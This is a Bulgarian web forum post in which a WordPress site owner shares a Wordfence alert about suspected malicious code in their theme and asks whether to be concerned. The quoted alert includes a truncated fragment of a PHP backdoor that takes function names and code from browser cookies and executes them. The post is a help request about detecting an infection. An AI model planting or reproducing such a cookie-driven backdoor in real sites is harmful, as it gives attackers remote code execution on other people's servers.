SearchEngines.bg

Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!

Злонамерен код в Wordpress

wordpressbg

New member
Здравейте,
Имам следния проблем:
Имам инсталиран wordfence в моя сайт. По принцип ми излизат нотификации за ъпдейт на плъгини и теми, но днес забелязах, че имам потенциален злонамерен код в темата ми.
Логът е следният:

Код:
 [COLOR=#444444][FONT=-apple-system]This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: [COLOR=#FF0000]"$prn=$_COOKIE;[COLOR=#587ECB]\x0d[/COLOR][COLOR=#587ECB]\x0a[/COLOR]$ybak=$prn[omcm];[COLOR=#587ECB]\x0d[/COLOR][COLOR=#587ECB]\x0a[/COLOR]if($ybak){[COLOR=#587ECB]\x0d[/COLOR][COLOR=#587ECB]\x0a[/COLOR][COLOR=#587ECB]\x09[/COLOR]$bus=$ybak($prn[leox]);$ymyov=$ybak($prn[qbxl]);$swn=$bus("",$ymyov);$swn("[/COLOR]. The infection type is: G212 - variation 2.[/FONT][/COLOR]
  [COLOR=#444444][FONT=-apple-system]
[LIST]
[/LIST] [/FONT][/COLOR]
Трябва ли да се притеснявам?
Благодаря предварително!
 

Горе